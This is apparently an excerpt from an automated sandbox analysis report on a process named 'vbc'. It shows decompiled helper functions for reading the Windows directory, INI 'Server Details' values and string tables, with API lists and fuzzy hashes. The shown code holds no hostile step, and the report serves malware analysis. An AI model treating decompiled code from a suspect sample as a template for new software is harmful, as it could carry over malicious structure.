                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Itemmemset$CountInfoLoadModifysprintfstrcatstrchr
                                                                                                                                                    • String ID: menu_%d
                                                                                                                                                    • API String ID: 3671758413-2417748251
                                                                                                                                                    • Opcode ID: e0b27bc8312c4869803a1ee04920a3f9795f2512d2491c73ec6fe14da36cbe17
                                                                                                                                                    • Instruction ID: 3be60505ea2565ef11dfa3f51dd36ce0e69a3f53bb310b440500eec60165980c
                                                                                                                                                    • Opcode Fuzzy Hash: e0b27bc8312c4869803a1ee04920a3f9795f2512d2491c73ec6fe14da36cbe17
                                                                                                                                                    • Instruction Fuzzy Hash: 9FD01D71A4D14037D72033356D09FCF19794BD3B15F5440A9F200722D1D57C5755857D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00406325 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00406325(char* _a4) {

				if( *0x417550 == 0) {
					 *0x417658 = GetWindowsDirectoryA(0x417550, 0x104);
				}
				strcpy(_a4, 0x417550);
				return  *0x417658;
			}



                                                                                                                                                    0x00406332
                                                                                                                                                    0x00406340
                                                                                                                                                    0x00406340
                                                                                                                                                    0x0040634a
                                                                                                                                                    0x00406357

                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(00417550,00000104,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040633A
                                                                                                                                                    • strcpy.MSVCRT(00000000,00417550,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040634A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DirectoryWindowsstrcpy
                                                                                                                                                    • String ID: PuA
                                                                                                                                                    • API String ID: 531766897-3228437271
                                                                                                                                                    • Opcode ID: b1972f0ba22637c8055687d42c6acbfd742ac988b9f6313726f8896cebb56ee7
                                                                                                                                                    • Instruction ID: dc620c75b08fae7ca861cc569808ec9e0c9c78cdcec5c9dc17d9b47d99426002
                                                                                                                                                    • Opcode Fuzzy Hash: b1972f0ba22637c8055687d42c6acbfd742ac988b9f6313726f8896cebb56ee7
                                                                                                                                                    • Instruction Fuzzy Hash: D2D0A77184E2907FE3015728BC45AC63FB5DB05330F10807BF508A25A0E7741C90879C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00408348 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00408348(char* __esi) {
				char* _t2;
				char* _t6;

				_t6 = __esi;
				E00406160(__esi);
				_t2 = strrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 = 0;
				}
				return strcat(_t6, "_lng.ini");
			}





                                                                                                                                                    0x00408348
                                                                                                                                                    0x00408349
                                                                                                                                                    0x00408351
                                                                                                                                                    0x0040835b
                                                                                                                                                    0x0040835d
                                                                                                                                                    0x0040835d
                                                                                                                                                    0x0040836d

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406160: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,0040834E,00000000,0040826C,?,00000000,00000104,?), ref: 0040616B
                                                                                                                                                    • strrchr.MSVCRT ref: 00408351
                                                                                                                                                    • strcat.MSVCRT(00000000,_lng.ini,00000000,00000104,?), ref: 00408366
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileModuleNamestrcatstrrchr
                                                                                                                                                    • String ID: _lng.ini
                                                                                                                                                    • API String ID: 3097366151-1948609170
                                                                                                                                                    • Opcode ID: d4342e7cf2f2cd7acb0c5595099143b60559064a13119ecfeb2f3085bb136c0c
                                                                                                                                                    • Instruction ID: a8d2890f819e62600bf11f9c0364550bfc67884382c2ab22ce71db24782b6e2f
                                                                                                                                                    • Opcode Fuzzy Hash: d4342e7cf2f2cd7acb0c5595099143b60559064a13119ecfeb2f3085bb136c0c
                                                                                                                                                    • Instruction Fuzzy Hash: 37C01275686A5438D11622355E03B8F01454F52745F24409BF903391D6DE5D569141AE
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00403397 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00403397(CHAR* _a4, CHAR* _a8, char _a12) {

				_t2 =  &_a12; // 0x403428
				return GetPrivateProfileStringA("Server Details", _a8, 0x412466,  *_t2, 0x7f, _a4);
			}



                                                                                                                                                    0x0040339d
                                                                                                                                                    0x004033b5

                                                                                                                                                    APIs
                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(Server Details,?,Function_00012466,(4@,0000007F,?), ref: 004033AF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfileString
                                                                                                                                                    • String ID: (4@$Server Details
                                                                                                                                                    • API String ID: 1096422788-3984282551
                                                                                                                                                    • Opcode ID: 7bf2893a727a8b250936425436c2602b2102234e3c58862608b198b8383da292
                                                                                                                                                    • Instruction ID: 5387a3ffe087b7673ef104c15d829f3f0df010b9e50aa15a0af8b6122c5a167a
                                                                                                                                                    • Opcode Fuzzy Hash: 7bf2893a727a8b250936425436c2602b2102234e3c58862608b198b8383da292
                                                                                                                                                    • Instruction Fuzzy Hash: A0C04031544301FAC5114F909F05E4D7F516B54B40F118415B24450065C1E54574DB26
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004084CE Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                    			E004084CE(intOrPtr* __esi, void* __eflags) {
				intOrPtr* _t22;
				intOrPtr* _t31;

				_t31 = __esi;
				 *__esi = 0x413320;
				_t22 = E00406549(0x1c8, __esi);
				_push(0x14);
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 4)) = _t22;
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 8)) = _t22;
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 0xc)) = _t22;
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				 *((intOrPtr*)(_t31 + 0x10)) = _t22;
				return _t31;
			}





                                                                                                                                                    0x004084ce
                                                                                                                                                    0x004084d6
                                                                                                                                                    0x004084dc
                                                                                                                                                    0x004084e1
                                                                                                                                                    0x004084e3
                                                                                                                                                    0x004084f3
                                                                                                                                                    0x00408505
                                                                                                                                                    0x004084f5
                                                                                                                                                    0x004084f5
                                                                                                                                                    0x004084f8
                                                                                                                                                    0x004084fa
                                                                                                                                                    0x004084fd
                                                                                                                                                    0x00408500
                                                                                                                                                    0x00408500
                                                                                                                                                    0x00408507
                                                                                                                                                    0x00408509
                                                                                                                                                    0x0040850c
                                                                                                                                                    0x00408514
                                                                                                                                                    0x00408526
                                                                                                                                                    0x00408516
                                                                                                                                                    0x00408516
                                                                                                                                                    0x00408519
                                                                                                                                                    0x0040851b
                                                                                                                                                    0x0040851e
                                                                                                                                                    0x00408521
                                                                                                                                                    0x00408521
                                                                                                                                                    0x00408528
                                                                                                                                                    0x0040852a
                                                                                                                                                    0x0040852d
                                                                                                                                                    0x00408535
                                                                                                                                                    0x00408547
                                                                                                                                                    0x00408537
                                                                                                                                                    0x00408537
                                                                                                                                                    0x0040853a
                                                                                                                                                    0x0040853c
                                                                                                                                                    0x0040853f
                                                                                                                                                    0x00408542
                                                                                                                                                    0x00408542
                                                                                                                                                    0x00408549
                                                                                                                                                    0x0040854b
                                                                                                                                                    0x0040854e
                                                                                                                                                    0x00408556
                                                                                                                                                    0x00408568
                                                                                                                                                    0x00408558
                                                                                                                                                    0x00408558
                                                                                                                                                    0x0040855b
                                                                                                                                                    0x0040855d
                                                                                                                                                    0x00408560
                                                                                                                                                    0x00408563
                                                                                                                                                    0x00408563
                                                                                                                                                    0x0040856b
                                                                                                                                                    0x00408571

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                    • Opcode ID: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
                                                                                                                                                    • Instruction ID: 33d46294e57da76ea2c08804649fae6184d1477937e8cd9eb119e1572679ad16
                                                                                                                                                    • Opcode Fuzzy Hash: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
                                                                                                                                                    • Instruction Fuzzy Hash: F321B3B0A01300AED7518F2B9945955FBE4FF94355B2AC8AFD149DB2B2EBB8C8408F14
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00406A74 Relevance: 5.1, APIs: 4, Instructions: 63stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00406A74(void* __eax, void* __ecx, char* _a4) {
				int _v8;
				void* __edi;
				int _t27;
				intOrPtr _t28;
				intOrPtr _t31;
				intOrPtr _t42;
				intOrPtr _t52;
				void** _t55;
				void** _t56;
				void* _t59;

				_t59 = __eax;
				_t27 = strlen(_a4);
				_t42 =  *((intOrPtr*)(_t59 + 4));
				_t52 = _t42 + _t27 + 1;
				_v8 = _t27;
				_t28 =  *((intOrPtr*)(_t59 + 0x14));
				 *((intOrPtr*)(_t59 + 4)) = _t52;
				_t55 = _t59 + 0x10;
				if(_t52 != 0xffffffff) {
					E004060FA(_t59, _t52, _t55, 1, _t28);
				} else {
					free( *_t55);
				}
				_t53 =  *(_t59 + 0x1c);
				_t31 =  *((intOrPtr*)(_t59 + 0x18));
				_t56 = _t59 + 0xc;
				if( *(_t59 + 0x1c) != 0xffffffff) {
					E004060FA(_t59 + 8, _t53, _t56, 4, _t31);
				} else {
					free( *_t56);
				}
				memcpy( *(_t59 + 0x10) + _t42, _a4, _v8);
				 *((char*)( *(_t59 + 0x10) + _t42 + _v8)) = 0;
				 *((intOrPtr*)( *_t56 +  *(_t59 + 0x1c) * 4)) = _t42;
				 *(_t59 + 0x1c) =  *(_t59 + 0x1c) + 1;
				_t25 =  *(_t59 + 0x1c) - 1; // -1
				return _t25;
			}













                                                                                                                                                    0x00406a7e
                                                                                                                                                    0x00406a80
                                                                                                                                                    0x00406a85
                                                                                                                                                    0x00406a88
                                                                                                                                                    0x00406a8f
                                                                                                                                                    0x00406a92
                                                                                                                                                    0x00406a96
                                                                                                                                                    0x00406a99
                                                                                                                                                    0x00406a9c
                                                                                                                                                    0x00406aac
                                                                                                                                                    0x00406a9e
                                                                                                                                                    0x00406aa0
                                                                                                                                                    0x00406aa0
                                                                                                                                                    0x00406ab2
                                                                                                                                                    0x00406ab8
                                                                                                                                                    0x00406abc
                                                                                                                                                    0x00406abf
                                                                                                                                                    0x00406ad0
                                                                                                                                                    0x00406ac1
                                                                                                                                                    0x00406ac3
                                                                                                                                                    0x00406ac3
                                                                                                                                                    0x00406ae3
                                                                                                                                                    0x00406af0
                                                                                                                                                    0x00406afc
                                                                                                                                                    0x00406aff
                                                                                                                                                    0x00406b06
                                                                                                                                                    0x00406b0c

                                                                                                                                                    APIs
                                                                                                                                                    • strlen.MSVCRT ref: 00406A80
                                                                                                                                                    • free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AA0
                                                                                                                                                      • Part of subcall function 004060FA: malloc.MSVCRT ref: 00406116
                                                                                                                                                      • Part of subcall function 004060FA: memcpy.MSVCRT ref: 0040612E
                                                                                                                                                      • Part of subcall function 004060FA: free.MSVCRT(00000000,00000000,75144DE0,00406B49,00000001,?,00000000,75144DE0,00406D88,00000000,?,?), ref: 00406137
                                                                                                                                                    • free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AC3
                                                                                                                                                    • memcpy.MSVCRT ref: 00406AE3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: free$memcpy$mallocstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3669619086-0
                                                                                                                                                    • Opcode ID: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
                                                                                                                                                    • Instruction ID: e46d755c35f7a0493bef025674ad9543d325b8c94dab604409744cdcda2aebf9
                                                                                                                                                    • Opcode Fuzzy Hash: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
                                                                                                                                                    • Instruction Fuzzy Hash: 70116D71200700EFC730EF18D8819AAB7F5EF45328B108A2EF957A7691DB35F9658B54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%